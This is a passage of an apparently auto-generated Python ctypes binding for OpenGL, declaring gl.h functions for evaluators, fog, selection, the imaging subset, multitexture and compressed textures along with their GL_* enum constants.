glMap1d = _link_function('glMap1d', None, [GLenum, GLdouble, GLdouble, GLint, GLint, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1396
glMap1f = _link_function('glMap1f', None, [GLenum, GLfloat, GLfloat, GLint, GLint, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1400
glMap2d = _link_function('glMap2d', None, [GLenum, GLdouble, GLdouble, GLint, GLint, GLdouble, GLdouble, GLint, GLint, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1404
glMap2f = _link_function('glMap2f', None, [GLenum, GLfloat, GLfloat, GLint, GLint, GLfloat, GLfloat, GLint, GLint, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1409
glGetMapdv = _link_function('glGetMapdv', None, [GLenum, GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1410
glGetMapfv = _link_function('glGetMapfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1411
glGetMapiv = _link_function('glGetMapiv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1413
glEvalCoord1d = _link_function('glEvalCoord1d', None, [GLdouble], None)
# /usr/include/GL/gl.h:1414
glEvalCoord1f = _link_function('glEvalCoord1f', None, [GLfloat], None)
# /usr/include/GL/gl.h:1416
glEvalCoord1dv = _link_function('glEvalCoord1dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1417
glEvalCoord1fv = _link_function('glEvalCoord1fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1419
glEvalCoord2d = _link_function('glEvalCoord2d', None, [GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1420
glEvalCoord2f = _link_function('glEvalCoord2f', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1422
glEvalCoord2dv = _link_function('glEvalCoord2dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1423
glEvalCoord2fv = _link_function('glEvalCoord2fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1425
glMapGrid1d = _link_function('glMapGrid1d', None, [GLint, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1426
glMapGrid1f = _link_function('glMapGrid1f', None, [GLint, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1428
glMapGrid2d = _link_function('glMapGrid2d', None, [GLint, GLdouble, GLdouble, GLint, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1430
glMapGrid2f = _link_function('glMapGrid2f', None, [GLint, GLfloat, GLfloat, GLint, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1433
glEvalPoint1 = _link_function('glEvalPoint1', None, [GLint], None)
# /usr/include/GL/gl.h:1435
glEvalPoint2 = _link_function('glEvalPoint2', None, [GLint, GLint], None)
# /usr/include/GL/gl.h:1437
glEvalMesh1 = _link_function('glEvalMesh1', None, [GLenum, GLint, GLint], None)
# /usr/include/GL/gl.h:1439
glEvalMesh2 = _link_function('glEvalMesh2', None, [GLenum, GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1446
glFogf = _link_function('glFogf', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1448
glFogi = _link_function('glFogi', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:1450
glFogfv = _link_function('glFogfv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1452
glFogiv = _link_function('glFogiv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1459
glFeedbackBuffer = _link_function('glFeedbackBuffer', None, [GLsizei, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1461
glPassThrough = _link_function('glPassThrough', None, [GLfloat], None)
# /usr/include/GL/gl.h:1463
glSelectBuffer = _link_function('glSelectBuffer', None, [GLsizei, POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1465
glInitNames = _link_function('glInitNames', None, [], None)
# /usr/include/GL/gl.h:1467
glLoadName = _link_function('glLoadName', None, [GLuint], None)
# /usr/include/GL/gl.h:1469
glPushName = _link_function('glPushName', None, [GLuint], None)
# /usr/include/GL/gl.h:1471
glPopName = _link_function('glPopName', None, [], None)
GL_RESCALE_NORMAL = 32826 # /usr/include/GL/gl.h:1479
GL_CLAMP_TO_EDGE = 33071 # /usr/include/GL/gl.h:1480
GL_MAX_ELEMENTS_VERTICES = 33000 # /usr/include/GL/gl.h:1481
GL_MAX_ELEMENTS_INDICES = 33001 # /usr/include/GL/gl.h:1482
GL_BGR = 32992 # /usr/include/GL/gl.h:1483
GL_BGRA = 32993 # /usr/include/GL/gl.h:1484
GL_UNSIGNED_BYTE_3_3_2 = 32818 # /usr/include/GL/gl.h:1485
GL_UNSIGNED_BYTE_2_3_3_REV = 33634 # /usr/include/GL/gl.h:1486
GL_UNSIGNED_SHORT_5_6_5 = 33635 # /usr/include/GL/gl.h:1487
GL_UNSIGNED_SHORT_5_6_5_REV = 33636 # /usr/include/GL/gl.h:1488
GL_UNSIGNED_SHORT_4_4_4_4 = 32819 # /usr/include/GL/gl.h:1489
GL_UNSIGNED_SHORT_4_4_4_4_REV = 33637 # /usr/include/GL/gl.h:1490
GL_UNSIGNED_SHORT_5_5_5_1 = 32820 # /usr/include/GL/gl.h:1491
GL_UNSIGNED_SHORT_1_5_5_5_REV = 33638 # /usr/include/GL/gl.h:1492
GL_UNSIGNED_INT_8_8_8_8 = 32821 # /usr/include/GL/gl.h:1493
GL_UNSIGNED_INT_8_8_8_8_REV = 33639 # /usr/include/GL/gl.h:1494
GL_UNSIGNED_INT_10_10_10_2 = 32822 # /usr/include/GL/gl.h:1495
GL_UNSIGNED_INT_2_10_10_10_REV = 33640 # /usr/include/GL/gl.h:1496
GL_LIGHT_MODEL_COLOR_CONTROL = 33272 # /usr/include/GL/gl.h:1497
GL_SINGLE_COLOR = 33273 # /usr/include/GL/gl.h:1498
GL_SEPARATE_SPECULAR_COLOR = 33274 # /usr/include/GL/gl.h:1499
GL_TEXTURE_MIN_LOD = 33082 # /usr/include/GL/gl.h:1500
GL_TEXTURE_MAX_LOD = 33083 # /usr/include/GL/gl.h:1501
GL_TEXTURE_BASE_LEVEL = 33084 # /usr/include/GL/gl.h:1502
GL_TEXTURE_MAX_LEVEL = 33085 # /usr/include/GL/gl.h:1503
GL_SMOOTH_POINT_SIZE_RANGE = 2834 # /usr/include/GL/gl.h:1504
GL_SMOOTH_POINT_SIZE_GRANULARITY = 2835 # /usr/include/GL/gl.h:1505
GL_SMOOTH_LINE_WIDTH_RANGE = 2850 # /usr/include/GL/gl.h:1506
GL_SMOOTH_LINE_WIDTH_GRANULARITY = 2851 # /usr/include/GL/gl.h:1507
GL_ALIASED_POINT_SIZE_RANGE = 33901 # /usr/include/GL/gl.h:1508
GL_ALIASED_LINE_WIDTH_RANGE = 33902 # /usr/include/GL/gl.h:1509
GL_PACK_SKIP_IMAGES = 32875 # /usr/include/GL/gl.h:1510
GL_PACK_IMAGE_HEIGHT = 32876 # /usr/include/GL/gl.h:1511
GL_UNPACK_SKIP_IMAGES = 32877 # /usr/include/GL/gl.h:1512
GL_UNPACK_IMAGE_HEIGHT = 32878 # /usr/include/GL/gl.h:1513
GL_TEXTURE_3D = 32879 # /usr/include/GL/gl.h:1514
GL_PROXY_TEXTURE_3D = 32880 # /usr/include/GL/gl.h:1515
GL_TEXTURE_DEPTH = 32881 # /usr/include/GL/gl.h:1516
GL_TEXTURE_WRAP_R = 32882 # /usr/include/GL/gl.h:1517
GL_MAX_3D_TEXTURE_SIZE = 32883 # /usr/include/GL/gl.h:1518
GL_TEXTURE_BINDING_3D = 32874 # /usr/include/GL/gl.h:1519
# /usr/include/GL/gl.h:1521
glDrawRangeElements = _link_function('glDrawRangeElements', None, [GLenum, GLuint, GLuint, GLsizei, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1524
glTexImage3D = _link_function('glTexImage3D', None, [GLenum, GLint, GLint, GLsizei, GLsizei, GLsizei, GLint, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1531
glTexSubImage3D = _link_function('glTexSubImage3D', None, [GLenum, GLint, GLint, GLint, GLint, GLsizei, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1538
glCopyTexSubImage3D = _link_function('glCopyTexSubImage3D', None, [GLenum, GLint, GLint, GLint, GLint, GLint, GLint, GLsizei, GLsizei], None)
PFNGLDRAWRANGEELEMENTSPROC = CFUNCTYPE(None, GLenum, GLuint, GLuint, GLsizei, GLenum, POINTER(GLvoid)) # /usr/include/GL/gl.h:1544
PFNGLTEXIMAGE3DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLsizei, GLsizei, GLsizei, GLint, GLenum, GLenum, POINTER(GLvoid)) # /usr/include/GL/gl.h:1545
PFNGLTEXSUBIMAGE3DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint, GLint, GLsizei, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)) # /usr/include/GL/gl.h:1546
PFNGLCOPYTEXSUBIMAGE3DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint, GLint, GLint, GLint, GLsizei, GLsizei) # /usr/include/GL/gl.h:1547
GL_CONSTANT_COLOR = 32769 # /usr/include/GL/gl.h:1554
GL_ONE_MINUS_CONSTANT_COLOR = 32770 # /usr/include/GL/gl.h:1555
GL_CONSTANT_ALPHA = 32771 # /usr/include/GL/gl.h:1556
GL_ONE_MINUS_CONSTANT_ALPHA = 32772 # /usr/include/GL/gl.h:1557
GL_COLOR_TABLE = 32976 # /usr/include/GL/gl.h:1558
GL_POST_CONVOLUTION_COLOR_TABLE = 32977 # /usr/include/GL/gl.h:1559
GL_POST_COLOR_MATRIX_COLOR_TABLE = 32978 # /usr/include/GL/gl.h:1560
GL_PROXY_COLOR_TABLE = 32979 # /usr/include/GL/gl.h:1561
GL_PROXY_POST_CONVOLUTION_COLOR_TABLE = 32980 # /usr/include/GL/gl.h:1562
GL_PROXY_POST_COLOR_MATRIX_COLOR_TABLE = 32981 # /usr/include/GL/gl.h:1563
GL_COLOR_TABLE_SCALE = 32982 # /usr/include/GL/gl.h:1564
GL_COLOR_TABLE_BIAS = 32983 # /usr/include/GL/gl.h:1565
GL_COLOR_TABLE_FORMAT = 32984 # /usr/include/GL/gl.h:1566
GL_COLOR_TABLE_WIDTH = 32985 # /usr/include/GL/gl.h:1567
GL_COLOR_TABLE_RED_SIZE = 32986 # /usr/include/GL/gl.h:1568
GL_COLOR_TABLE_GREEN_SIZE = 32987 # /usr/include/GL/gl.h:1569
GL_COLOR_TABLE_BLUE_SIZE = 32988 # /usr/include/GL/gl.h:1570
GL_COLOR_TABLE_ALPHA_SIZE = 32989 # /usr/include/GL/gl.h:1571
GL_COLOR_TABLE_LUMINANCE_SIZE = 32990 # /usr/include/GL/gl.h:1572
GL_COLOR_TABLE_INTENSITY_SIZE = 32991 # /usr/include/GL/gl.h:1573
GL_CONVOLUTION_1D = 32784 # /usr/include/GL/gl.h:1574
GL_CONVOLUTION_2D = 32785 # /usr/include/GL/gl.h:1575
GL_SEPARABLE_2D = 32786 # /usr/include/GL/gl.h:1576
GL_CONVOLUTION_BORDER_MODE = 32787 # /usr/include/GL/gl.h:1577
GL_CONVOLUTION_FILTER_SCALE = 32788 # /usr/include/GL/gl.h:1578
GL_CONVOLUTION_FILTER_BIAS = 32789 # /usr/include/GL/gl.h:1579
GL_REDUCE = 32790 # /usr/include/GL/gl.h:1580
GL_CONVOLUTION_FORMAT = 32791 # /usr/include/GL/gl.h:1581
GL_CONVOLUTION_WIDTH = 32792 # /usr/include/GL/gl.h:1582
GL_CONVOLUTION_HEIGHT = 32793 # /usr/include/GL/gl.h:1583
GL_MAX_CONVOLUTION_WIDTH = 32794 # /usr/include/GL/gl.h:1584
GL_MAX_CONVOLUTION_HEIGHT = 32795 # /usr/include/GL/gl.h:1585
GL_POST_CONVOLUTION_RED_SCALE = 32796 # /usr/include/GL/gl.h:1586
GL_POST_CONVOLUTION_GREEN_SCALE = 32797 # /usr/include/GL/gl.h:1587
GL_POST_CONVOLUTION_BLUE_SCALE = 32798 # /usr/include/GL/gl.h:1588
GL_POST_CONVOLUTION_ALPHA_SCALE = 32799 # /usr/include/GL/gl.h:1589
GL_POST_CONVOLUTION_RED_BIAS = 32800 # /usr/include/GL/gl.h:1590
GL_POST_CONVOLUTION_GREEN_BIAS = 32801 # /usr/include/GL/gl.h:1591
GL_POST_CONVOLUTION_BLUE_BIAS = 32802 # /usr/include/GL/gl.h:1592
GL_POST_CONVOLUTION_ALPHA_BIAS = 32803 # /usr/include/GL/gl.h:1593
GL_CONSTANT_BORDER = 33105 # /usr/include/GL/gl.h:1594
GL_REPLICATE_BORDER = 33107 # /usr/include/GL/gl.h:1595
GL_CONVOLUTION_BORDER_COLOR = 33108 # /usr/include/GL/gl.h:1596
GL_COLOR_MATRIX = 32945 # /usr/include/GL/gl.h:1597
GL_COLOR_MATRIX_STACK_DEPTH = 32946 # /usr/include/GL/gl.h:1598
GL_MAX_COLOR_MATRIX_STACK_DEPTH = 32947 # /usr/include/GL/gl.h:1599
GL_POST_COLOR_MATRIX_RED_SCALE = 32948 # /usr/include/GL/gl.h:1600
GL_POST_COLOR_MATRIX_GREEN_SCALE = 32949 # /usr/include/GL/gl.h:1601
GL_POST_COLOR_MATRIX_BLUE_SCALE = 32950 # /usr/include/GL/gl.h:1602
GL_POST_COLOR_MATRIX_ALPHA_SCALE = 32951 # /usr/include/GL/gl.h:1603
GL_POST_COLOR_MATRIX_RED_BIAS = 32952 # /usr/include/GL/gl.h:1604
GL_POST_COLOR_MATRIX_GREEN_BIAS = 32953 # /usr/include/GL/gl.h:1605
GL_POST_COLOR_MATRIX_BLUE_BIAS = 32954 # /usr/include/GL/gl.h:1606
GL_POST_COLOR_MATRIX_ALPHA_BIAS = 32955 # /usr/include/GL/gl.h:1607
GL_HISTOGRAM = 32804 # /usr/include/GL/gl.h:1608
GL_PROXY_HISTOGRAM = 32805 # /usr/include/GL/gl.h:1609
GL_HISTOGRAM_WIDTH = 32806 # /usr/include/GL/gl.h:1610
GL_HISTOGRAM_FORMAT = 32807 # /usr/include/GL/gl.h:1611
GL_HISTOGRAM_RED_SIZE = 32808 # /usr/include/GL/gl.h:1612
GL_HISTOGRAM_GREEN_SIZE = 32809 # /usr/include/GL/gl.h:1613
GL_HISTOGRAM_BLUE_SIZE = 32810 # /usr/include/GL/gl.h:1614
GL_HISTOGRAM_ALPHA_SIZE = 32811 # /usr/include/GL/gl.h:1615
GL_HISTOGRAM_LUMINANCE_SIZE = 32812 # /usr/include/GL/gl.h:1616
GL_HISTOGRAM_SINK = 32813 # /usr/include/GL/gl.h:1617
GL_MINMAX = 32814 # /usr/include/GL/gl.h:1618
GL_MINMAX_FORMAT = 32815 # /usr/include/GL/gl.h:1619
GL_MINMAX_SINK = 32816 # /usr/include/GL/gl.h:1620
GL_TABLE_TOO_LARGE = 32817 # /usr/include/GL/gl.h:1621
GL_BLEND_EQUATION = 32777 # /usr/include/GL/gl.h:1622
GL_MIN = 32775 # /usr/include/GL/gl.h:1623
GL_MAX = 32776 # /usr/include/GL/gl.h:1624
GL_FUNC_ADD = 32774 # /usr/include/GL/gl.h:1625
GL_FUNC_SUBTRACT = 32778 # /usr/include/GL/gl.h:1626
GL_FUNC_REVERSE_SUBTRACT = 32779 # /usr/include/GL/gl.h:1627
GL_BLEND_COLOR = 32773 # /usr/include/GL/gl.h:1628
# /usr/include/GL/gl.h:1631
glColorTable = _link_function('glColorTable', None, [GLenum, GLenum, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1635
glColorSubTable = _link_function('glColorSubTable', None, [GLenum, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1640
glColorTableParameteriv = _link_function('glColorTableParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1643
glColorTableParameterfv = _link_function('glColorTableParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1646
glCopyColorSubTable = _link_function('glCopyColorSubTable', None, [GLenum, GLsizei, GLint, GLint, GLsizei], None)
# /usr/include/GL/gl.h:1649
glCopyColorTable = _link_function('glCopyColorTable', None, [GLenum, GLenum, GLint, GLint, GLsizei], None)
# /usr/include/GL/gl.h:1652
glGetColorTable = _link_function('glGetColorTable', None, [GLenum, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1655
glGetColorTableParameterfv = _link_function('glGetColorTableParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1658
glGetColorTableParameteriv = _link_function('glGetColorTableParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1661
glBlendEquation = _link_function('glBlendEquation', None, [GLenum], None)
# /usr/include/GL/gl.h:1663
glBlendColor = _link_function('glBlendColor', None, [GLclampf, GLclampf, GLclampf, GLclampf], None)
# /usr/include/GL/gl.h:1666
glHistogram = _link_function('glHistogram', None, [GLenum, GLsizei, GLenum, GLboolean], None)
# /usr/include/GL/gl.h:1669
glResetHistogram = _link_function('glResetHistogram', None, [GLenum], None)
# /usr/include/GL/gl.h:1671
glGetHistogram = _link_function('glGetHistogram', None, [GLenum, GLboolean, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1675
glGetHistogramParameterfv = _link_function('glGetHistogramParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1678
glGetHistogramParameteriv = _link_function('glGetHistogramParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1681
glMinmax = _link_function('glMinmax', None, [GLenum, GLenum, GLboolean], None)
# /usr/include/GL/gl.h:1684
glResetMinmax = _link_function('glResetMinmax', None, [GLenum], None)
# /usr/include/GL/gl.h:1686
glGetMinmax = _link_function('glGetMinmax', None, [GLenum, GLboolean, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1690
glGetMinmaxParameterfv = _link_function('glGetMinmaxParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1693
glGetMinmaxParameteriv = _link_function('glGetMinmaxParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1696
glConvolutionFilter1D = _link_function('glConvolutionFilter1D', None, [GLenum, GLenum, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1700
glConvolutionFilter2D = _link_function('glConvolutionFilter2D', None, [GLenum, GLenum, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1704
glConvolutionParameterf = _link_function('glConvolutionParameterf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1707
glConvolutionParameterfv = _link_function('glConvolutionParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1710
glConvolutionParameteri = _link_function('glConvolutionParameteri', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1713
glConvolutionParameteriv = _link_function('glConvolutionParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1716
glCopyConvolutionFilter1D = _link_function('glCopyConvolutionFilter1D', None, [GLenum, GLenum, GLint, GLint, GLsizei], None)
# /usr/include/GL/gl.h:1719
glCopyConvolutionFilter2D = _link_function('glCopyConvolutionFilter2D', None, [GLenum, GLenum, GLint, GLint, GLsizei, GLsizei], None)
# /usr/include/GL/gl.h:1723
glGetConvolutionFilter = _link_function('glGetConvolutionFilter', None, [GLenum, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1726
glGetConvolutionParameterfv = _link_function('glGetConvolutionParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1729
glGetConvolutionParameteriv = _link_function('glGetConvolutionParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1732
glSeparableFilter2D = _link_function('glSeparableFilter2D', None, [GLenum, GLenum, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid), POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1736
glGetSeparableFilter = _link_function('glGetSeparableFilter', None, [GLenum, GLenum, GLenum, POINTER(GLvoid), POINTER(GLvoid), POINTER(GLvoid)], None)
PFNGLBLENDCOLORPROC = CFUNCTYPE(None, GLclampf, GLclampf, GLclampf, GLclampf) # /usr/include/GL/gl.h:1739
PFNGLBLENDEQUATIONPROC = CFUNCTYPE(None, GLenum) # /usr/include/GL/gl.h:1740
GL_TEXTURE0 = 33984 # /usr/include/GL/gl.h:1749
GL_TEXTURE1 = 33985 # /usr/include/GL/gl.h:1750
GL_TEXTURE2 = 33986 # /usr/include/GL/gl.h:1751
GL_TEXTURE3 = 33987 # /usr/include/GL/gl.h:1752
GL_TEXTURE4 = 33988 # /usr/include/GL/gl.h:1753
GL_TEXTURE5 = 33989 # /usr/include/GL/gl.h:1754
GL_TEXTURE6 = 33990 # /usr/include/GL/gl.h:1755
GL_TEXTURE7 = 33991 # /usr/include/GL/gl.h:1756
GL_TEXTURE8 = 33992 # /usr/include/GL/gl.h:1757
GL_TEXTURE9 = 33993 # /usr/include/GL/gl.h:1758
GL_TEXTURE10 = 33994 # /usr/include/GL/gl.h:1759
GL_TEXTURE11 = 33995 # /usr/include/GL/gl.h:1760
GL_TEXTURE12 = 33996 # /usr/include/GL/gl.h:1761
GL_TEXTURE13 = 33997 # /usr/include/GL/gl.h:1762
GL_TEXTURE14 = 33998 # /usr/include/GL/gl.h:1763
GL_TEXTURE15 = 33999 # /usr/include/GL/gl.h:1764
GL_TEXTURE16 = 34000 # /usr/include/GL/gl.h:1765
GL_TEXTURE17 = 34001 # /usr/include/GL/gl.h:1766
GL_TEXTURE18 = 34002 # /usr/include/GL/gl.h:1767
GL_TEXTURE19 = 34003 # /usr/include/GL/gl.h:1768
GL_TEXTURE20 = 34004 # /usr/include/GL/gl.h:1769
GL_TEXTURE21 = 34005 # /usr/include/GL/gl.h:1770
GL_TEXTURE22 = 34006 # /usr/include/GL/gl.h:1771
GL_TEXTURE23 = 34007 # /usr/include/GL/gl.h:1772
GL_TEXTURE24 = 34008 # /usr/include/GL/gl.h:1773
GL_TEXTURE25 = 34009 # /usr/include/GL/gl.h:1774
GL_TEXTURE26 = 34010 # /usr/include/GL/gl.h:1775
GL_TEXTURE27 = 34011 # /usr/include/GL/gl.h:1776
GL_TEXTURE28 = 34012 # /usr/include/GL/gl.h:1777
GL_TEXTURE29 = 34013 # /usr/include/GL/gl.h:1778
GL_TEXTURE30 = 34014 # /usr/include/GL/gl.h:1779
GL_TEXTURE31 = 34015 # /usr/include/GL/gl.h:1780
GL_ACTIVE_TEXTURE = 34016 # /usr/include/GL/gl.h:1781
GL_CLIENT_ACTIVE_TEXTURE = 34017 # /usr/include/GL/gl.h:1782
GL_MAX_TEXTURE_UNITS = 34018 # /usr/include/GL/gl.h:1783
GL_NORMAL_MAP = 34065 # /usr/include/GL/gl.h:1785
GL_REFLECTION_MAP = 34066 # /usr/include/GL/gl.h:1786
GL_TEXTURE_CUBE_MAP = 34067 # /usr/include/GL/gl.h:1787
GL_TEXTURE_BINDING_CUBE_MAP = 34068 # /usr/include/GL/gl.h:1788
GL_TEXTURE_CUBE_MAP_POSITIVE_X = 34069 # /usr/include/GL/gl.h:1789
GL_TEXTURE_CUBE_MAP_NEGATIVE_X = 34070 # /usr/include/GL/gl.h:1790
GL_TEXTURE_CUBE_MAP_POSITIVE_Y = 34071 # /usr/include/GL/gl.h:1791
GL_TEXTURE_CUBE_MAP_NEGATIVE_Y = 34072 # /usr/include/GL/gl.h:1792
GL_TEXTURE_CUBE_MAP_POSITIVE_Z = 34073 # /usr/include/GL/gl.h:1793
GL_TEXTURE_CUBE_MAP_NEGATIVE_Z = 34074 # /usr/include/GL/gl.h:1794
GL_PROXY_TEXTURE_CUBE_MAP = 34075 # /usr/include/GL/gl.h:1795
GL_MAX_CUBE_MAP_TEXTURE_SIZE = 34076 # /usr/include/GL/gl.h:1796
GL_COMPRESSED_ALPHA = 34025 # /usr/include/GL/gl.h:1798
GL_COMPRESSED_LUMINANCE = 34026 # /usr/include/GL/gl.h:1799
GL_COMPRESSED_LUMINANCE_ALPHA = 34027 # /usr/include/GL/gl.h:1800
GL_COMPRESSED_INTENSITY = 34028 # /usr/include/GL/gl.h:1801
GL_COMPRESSED_RGB = 34029 # /usr/include/GL/gl.h:1802
GL_COMPRESSED_RGBA = 34030 # /usr/include/GL/gl.h:1803
GL_TEXTURE_COMPRESSION_HINT = 34031 # /usr/include/GL/gl.h:1804
GL_TEXTURE_COMPRESSED_IMAGE_SIZE = 34464 # /usr/include/GL/gl.h:1805
GL_TEXTURE_COMPRESSED = 34465 # /usr/include/GL/gl.h:1806
GL_NUM_COMPRESSED_TEXTURE_FORMATS = 34466 # /usr/include/GL/gl.h:1807
GL_COMPRESSED_TEXTURE_FORMATS = 34467 # /usr/include/GL/gl.h:1808
GL_MULTISAMPLE = 32925 # /usr/include/GL/gl.h:1810
GL_SAMPLE_ALPHA_TO_COVERAGE = 32926 # /usr/include/GL/gl.h:1811
GL_SAMPLE_ALPHA_TO_ONE = 32927 # /usr/include/GL/gl.h:1812
GL_SAMPLE_COVERAGE = 32928 # /usr/include/GL/gl.h:1813
GL_SAMPLE_BUFFERS = 32936 # /usr/include/GL/gl.h:1814
GL_SAMPLES = 32937 # /usr/include/GL/gl.h:1815
GL_SAMPLE_COVERAGE_VALUE = 32938 # /usr/include/GL/gl.h:1816
GL_SAMPLE_COVERAGE_INVERT = 32939 # /usr/include/GL/gl.h:1817
GL_MULTISAMPLE_BIT = 536870912 # /usr/include/GL/gl.h:1818
GL_TRANSPOSE_MODELVIEW_MATRIX = 34019 # /usr/include/GL/gl.h:1820
GL_TRANSPOSE_PROJECTION_MATRIX = 34020 # /usr/include/GL/gl.h:1821
GL_TRANSPOSE_TEXTURE_MATRIX = 34021 # /usr/include/GL/gl.h:1822
GL_TRANSPOSE_COLOR_MATRIX = 34022 # /usr/include/GL/gl.h:1823
GL_COMBINE = 34160 # /usr/include/GL/gl.h:1825
GL_COMBINE_RGB = 34161 # /usr/include/GL/gl.h:1826
GL_COMBINE_ALPHA = 34162 # /usr/include/GL/gl.h:1827
GL_SOURCE0_RGB = 34176 # /usr/include/GL/gl.h:1828
GL_SOURCE1_RGB = 34177 # /usr/include/GL/gl.h:1829
GL_SOURCE2_RGB = 34178 # /usr/include/GL/gl.h:1830
GL_SOURCE0_ALPHA = 34184 # /usr/include/GL/gl.h:1831
GL_SOURCE1_ALPHA = 34185 # /usr/include/GL/gl.h:1832
GL_SOURCE2_ALPHA = 34186 # /usr/include/GL/gl.h:1833
GL_OPERAND0_RGB = 34192 # /usr/include/GL/gl.h:1834
GL_OPERAND1_RGB = 34193 # /usr/include/GL/gl.h:1835
GL_OPERAND2_RGB = 34194 # /usr/include/GL/gl.h:1836
GL_OPERAND0_ALPHA = 34200 # /usr/include/GL/gl.h:1837
GL_OPERAND1_ALPHA = 34201 # /usr/include/GL/gl.h:1838
GL_OPERAND2_ALPHA = 34202 # /usr/include/GL/gl.h:1839
GL_RGB_SCALE = 34163 # /usr/include/GL/gl.h:1840
GL_ADD_SIGNED = 34164 # /usr/include/GL/gl.h:1841
GL_INTERPOLATE = 34165 # /usr/include/GL/gl.h:1842
GL_SUBTRACT = 34023 # /usr/include/GL/gl.h:1843
GL_CONSTANT = 34166 # /usr/include/GL/gl.h:1844
GL_PRIMARY_COLOR = 34167 # /usr/include/GL/gl.h:1845
GL_PREVIOUS = 34168 # /usr/include/GL/gl.h:1846
GL_DOT3_RGB = 34478 # /usr/include/GL/gl.h:1848
GL_DOT3_RGBA = 34479 # /usr/include/GL/gl.h:1849
GL_CLAMP_TO_BORDER = 33069 # /usr/include/GL/gl.h:1851
# /usr/include/GL/gl.h:1853
glActiveTexture = _link_function('glActiveTexture', None, [GLenum], None)
# /usr/include/GL/gl.h:1855
glClientActiveTexture = _link_function('glClientActiveTexture', None, [GLenum], None)
# /usr/include/GL/gl.h:1857
glCompressedTexImage1D = _link_function('glCompressedTexImage1D', None, [GLenum, GLint, GLenum, GLsizei, GLint, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1859
glCompressedTexImage2D = _link_function('glCompressedTexImage2D', None, [GLenum, GLint, GLenum, GLsizei, GLsizei, GLint, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1861
glCompressedTexImage3D = _link_function('glCompressedTexImage3D', None, [GLenum, GLint, GLenum, GLsizei, GLsizei, GLsizei, GLint, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1863
glCompressedTexSubImage1D = _link_function('glCompressedTexSubImage1D', None, [GLenum, GLint, GLint, GLsizei, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1865
glCompressedTexSubImage2D = _link_function('glCompressedTexSubImage2D', None, [GLenum, GLint, GLint, GLint, GLsizei, GLsizei, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1867
glCompressedTexSubImage3D = _link_function('glCompressedTexSubImage3D', None, [GLenum, GLint, GLint, GLint, GLint, GLsizei, GLsizei, GLsizei, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1869
